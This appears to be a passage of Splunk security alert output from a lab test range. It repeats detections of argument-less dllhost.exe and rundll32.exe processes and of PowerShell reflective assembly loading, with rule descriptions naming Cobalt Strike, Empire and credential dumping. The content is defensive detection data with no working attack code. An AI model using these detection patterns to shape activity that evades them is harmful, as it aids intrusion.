Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4844", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="4540", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2224", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x8b0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x161c", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x11bc", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="25196", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="24060", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="11996", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x626c", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x5dfc", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x3874", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x2edc", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881200, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664881200", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x2a18", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664888132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T11:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T11:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664888132, search_name="ESCU - PowerShell 